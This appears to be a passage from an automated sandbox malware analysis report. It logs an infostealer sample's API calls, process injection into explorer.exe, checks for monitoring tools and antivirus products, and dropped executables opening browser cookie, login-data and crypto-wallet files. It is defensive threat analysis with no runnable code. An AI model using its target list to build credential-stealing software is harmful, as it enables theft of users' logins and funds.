              Source: C:\Windows\explorer.exeCode function: __getlocaleinfo,_malloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,GetCPInfo,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA,free,free,free,free,free,free,free,free,free,5_2_0DFBF8DC
              Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,5_2_0DFD0370
              Source: C:\Windows\explorer.exeCode function: _calloc_crt,_malloc_crt,free,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_num,free,free,free,5_2_0DFC8AAC
              Source: C:\Windows\explorer.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,5_2_0DFC824C
              Source: C:\Windows\explorer.exeCode function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,5_2_0DFC9234
              Source: C:\Windows\explorer.exe Code function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,GetLocaleInfoEx,_calloc_crt,GetLocaleInfoEx,free,5_2_0E120EA8
              Source: C:\Windows\explorer.exe Code function: _getptd,__lc_wcstolc,__get_qualified_locale,__lc_lctowcs,GetLocaleInfoEx,GetACP,5_2_0E122EAC
              Source: C:\Windows\explorer.exe Code function: _getptd,GetLocaleInfoEx,GetLocaleInfoEx,TestDefaultCountry,GetLocaleInfoEx,TestDefaultCountry,_getptd,GetLocaleInfoEx,5_2_0E129FCC
              Source: C:\Windows\explorer.exe Code function: GetLocaleInfoEx,GetLocaleInfoEx,GetACP,5_2_0E12A438
              Source: C:\Windows\explorer.exe Code function: GetLocaleInfoEx,5_2_0E12A4EC
              Source: C:\Windows\explorer.exeCode function: _calloc_crt,_malloc_crt,free,_malloc_crt,free,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_mon,free,free,free,free,5_2_0E128520
              Source: C:\Windows\explorer.exe Code function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,GetLocaleInfoEx,GetLocaleInfoEx,GetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,5_2_0E12A5F0
              Source: C:\Windows\explorer.exeCode function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,5_2_0E129234
              Source: C:\Windows\explorer.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,5_2_0E12824C
              Source: C:\Windows\explorer.exe Code function: _calloc_crt,_malloc_crt,free,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_num,free,free,free,5_2_0E128AAC
              Source: C:\Windows\explorer.exe Code function: GetLocaleInfoEx,5_2_0E130370
              Source: C:\Windows\explorer.exe Code function: __getlocaleinfo,_malloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,GetCPInfo,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA,free,free,free,free,free,free,free,free,free,5_2_0E11F8DC
              Source: C:\Windows\explorer.exe Code function: GetLocaleInfoEx,malloc,GetLocaleInfoEx,WideCharToMultiByte,free,5_2_0E1280F0
              Source: C:\Windows\explorer.exe Code function: _getptd,GetLocaleInfoEx,GetLocaleInfoEx,TestDefaultCountry,GetLocaleInfoEx,TestDefaultCountry,_getptd,GetLocaleInfoEx,5_2_0FF69FCC
              Source: C:\Windows\explorer.exe Code function: _getptd,__lc_wcstolc,__get_qualified_locale,__lc_lctowcs,GetLocaleInfoEx,GetACP,5_2_0FF62EAC
              Source: C:\Windows\explorer.exe Code function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,GetLocaleInfoEx,_calloc_crt,GetLocaleInfoEx,free,5_2_0FF60EA8
              Source: C:\Windows\explorer.exe Code function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,GetLocaleInfoEx,GetLocaleInfoEx,GetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,5_2_0FF6A5F0
              Source: C:\Windows\explorer.exeCode function: _calloc_crt,_malloc_crt,free,_malloc_crt,free,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_mon,free,free,free,free,5_2_0FF68520
              Source: C:\Windows\explorer.exe Code function: GetLocaleInfoEx,5_2_0FF6A4EC
              Source: C:\Windows\explorer.exe Code function: GetLocaleInfoEx,GetLocaleInfoEx,GetACP,5_2_0FF6A438
              Source: C:\Windows\explorer.exe Code function: GetLocaleInfoEx,5_2_0FF70370
              Source: C:\Windows\explorer.exe Code function: _calloc_crt,_malloc_crt,free,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_num,free,free,free,5_2_0FF68AAC
              Source: C:\Windows\explorer.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,5_2_0FF6824C
              Source: C:\Windows\explorer.exeCode function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,5_2_0FF69234
              Source: C:\Windows\explorer.exe Code function: GetLocaleInfoEx,malloc,GetLocaleInfoEx,WideCharToMultiByte,free,5_2_0FF680F0
              Source: C:\Windows\explorer.exe Code function: __getlocaleinfo,_malloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,GetCPInfo,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA,free,free,free,free,free,free,free,free,free,5_2_0FF5F8DC
              Source: C:\Windows\explorer.exe Code function: __getlocaleinfo,_malloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA,free,free,free,free,free,free,free,free,free,5_2_0823F211
              Source: C:\Windows\explorer.exeCode function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,5_2_08248B69
              Source: C:\Windows\explorer.exe Code function: _calloc_crt,_malloc_crt,free,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_num,free,free,free,5_2_082483E1
              Source: C:\Windows\explorer.exe Code function: __crtGetLocaleInfoA,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,_calloc_crt,free,_invoke_watson,5_2_082407DD
              Source: C:\Windows\explorer.exe Code function: __crtGetLocaleInfoA,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,_calloc_crt,free,_invoke_watson,5_2_0DEF07DD
              Source: C:\Windows\explorer.exe Code function: _calloc_crt,_malloc_crt,free,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_num,free,free,free,5_2_0DEF83E1
              Source: C:\Windows\explorer.exeCode function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,5_2_0DEF8B69
              Source: C:\Windows\explorer.exe Code function: __getlocaleinfo,_malloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA,free,free,free,free,free,free,free,free,free,5_2_0DEEF211
              Source: C:\Windows\explorer.exe Code function: __crtGetLocaleInfoA,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,_calloc_crt,free,_invoke_watson,5_2_0E0A07DD
              Source: C:\Windows\explorer.exe Code function: __getlocaleinfo,_malloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA,free,free,free,free,free,free,free,free,free,5_2_0E09F211
              Source: C:\Windows\explorer.exeCode function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,5_2_0E0A8B69
              Source: C:\Windows\explorer.exe Code function: _calloc_crt,_malloc_crt,free,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_num,free,free,free,5_2_0E0A83E1
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe Code function: GetProcAddress,GetLocaleInfoW,13_2_00007FFBBB89DC20
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,13_2_00007FFBBB8EFA48
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,13_2_00007FFBBB8EF8C0
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe Code function: GetPrimaryLen,EnumSystemLocalesW,13_2_00007FFBBB8EF478
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe Code function: GetPrimaryLen,EnumSystemLocalesW,13_2_00007FFBBB8EF3C4
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe Code function: EnumSystemLocalesW,13_2_00007FFBBB8EF35C
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe Code function: EnterCriticalSection,EnumSystemLocalesW,LeaveCriticalSection,13_2_00007FFBBB8ED2E0
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\audiodg.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\msiexec.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe Queries volume information: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI81442\ucrtbase.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI81442\base_library.zip VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI81442 VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI81442\_ctypes.pyd VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-console-l1-1-0.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI81442\_hashlib.pyd VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI81442\_lzma.pyd VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI81442\_socket.pyd VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe Queries volume information: C:\Users\user\Desktop VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe Queries volume information: C:\Users\user\Desktop\GIGIYTFFYT VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe Queries volume information: C:\Users\user\Documents VolumeInformation
              Source: C:\Windows\explorer.exeCode function: 5_2_0DFD02F0 GetSystemTimeAsFileTime,5_2_0DFD02F0
              Source: C:\Windows\explorer.exeCode function: 5_2_0DFAA990 GetUserNameW,GetComputerNameW,GetNativeSystemInfo,GetVersionExA,wsprintfA,free,5_2_0DFAA990
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 12_2_00007FF7F251518C _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,12_2_00007FF7F251518C
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeCode function: 0_2_00007FF7E83C339C GetVersionExW,0_2_00007FF7E83C339C
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: uFVgJVXaEU.exe, svchost.exe, 2F409E82DCA61388941053.exe, audiodg.exe, msiexec.exeBinary or memory string: procmon.exe
              Source: uFVgJVXaEU.exe, svchost.exe, 2F409E82DCA61388941053.exe, audiodg.exe, msiexec.exeBinary or memory string: procexp.exe
              Source: uFVgJVXaEU.exe, svchost.exe, 2F409E82DCA61388941053.exe, audiodg.exe, msiexec.exeBinary or memory string: autoruns.exe
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

              Stealing of Sensitive Information

              Source: Yara match | File source: dump.pcap, type: PCAP
              Source: Yara match | File source: 6.0.F72F.tmp.ssg.exe.4c0000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 00000006.00000000.1490441463.00000000004C2000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
              Source: Yara match | File source: 00000005.00000003.1489240627.000000000A37D000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: explorer.exe PID: 4084, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: F72F.tmp.ssg.exe PID: 7860, type: MEMORYSTR
              Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe, type: DROPPED
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe | File opened: C:\Users\user\AppData\Roaming\atomic\
